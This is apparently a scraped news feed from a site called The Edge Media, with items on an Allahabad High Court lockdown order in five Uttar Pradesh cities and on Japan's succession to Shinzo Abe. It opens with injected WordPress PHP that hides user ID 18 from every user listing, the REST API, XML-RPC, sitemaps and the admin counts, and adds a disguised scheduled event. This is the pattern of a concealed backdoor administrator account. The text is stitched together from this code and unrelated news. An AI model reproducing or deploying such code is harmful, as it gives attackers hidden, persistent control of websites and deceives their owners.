add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post High court orders to impose lockdown in 5 cities of UP appeared first on The Edge Media.
]]>
‘Consider a 15-day lockdown across the state’
The Allahabad High Court has also asked the state government to consider a 15-day lockdown in the entire state. The order of the High Court will be effective from tonight in these 5 cities.
That is, there is a complete lockdown order in Lucknow, Prayagraj, Gorakhpur, Kanpur and Varanasi from tonight itself. This order has been given by the Division Bench of the High Court on Covid-19 in UP.
The next hearing of the case will be held on April 26 at 11 am. The Division Bench of Justice Siddharth Verma and Justice Ajit Kumar is hearing the case.
The Allahabad High Court has issued strict instructions to the Uttar Pradesh government for the cities of Prayagraj, Lucknow, Varanasi, Kanpur Nagar and Gorakhpur regarding the growing corona infection. Let’s know what the Allahabad High Court has said in its order-
1. The High Court has said in its order that all the establishments, except the essential services including financial institutions, medical, health services, industrial, municipal and public transport will remain closed till April 26, 2021.
No more than 25 people will be allowed in the wedding ceremony. The DM should take a decision only after considering the measures taken to prevent corona at his level.
5. Any kind of public or religious activities should not be done till April 26, 2021. All religious establishments are directed to remain closed till 26 April 2021.
6. All the street vendors including fruits and vegetables, milk and bread vendors will be able to sell goods on the roads till April 26, 2021 till 11 am every day.
7. Information about the Containment Zone should be given every day in two major Hindi and English newspapers in Prayagraj, Lucknow, Varanasi, Kanpur Nagar / Dehat and Gorakhpur districts.
8. All types of public movement on the roads should be stopped and movement should be allowed only for medical help and emergency needs.
9. Along with this, the High Court has instructed the state government to speed up the vaccination drive further.
10. The High Court has today directed the Chief Secretary of Uttar Pradesh to send the DM of the respective districts to implement these instructions.
The post High court orders to impose lockdown in 5 cities of UP appeared first on The Edge Media.
]]>The post Japan Considering To Pick New Prime Minister To Succeed Shinzo Abe appeared first on The Edge Media.
]]>According to public broadcaster NHK, the ruling Liberal Democratic Party is expected to decide when and how to choose its next leader in a General Council meeting on September 1.
Meanwhile, LDP top officials are making final arrangements to have its members in both houses of the Diet meet around September 13-15 to choose the party’s president. Then, the party plans to call an extraordinary parliamentary session to elect the new prime minister on September 17, according to the report.
Currently, LDP Policy Research Council Chairperson Fumio Kishida and former LDP Secretary-General Shigeru Ishiba have shown interest in running in the party’s presidential race. Chief Cabinet Secretary Yoshihide Suga is also seen as a potential candidate.
– ANI
The post Japan Considering To Pick New Prime Minister To Succeed Shinzo Abe appeared first on The Edge Media.
]]>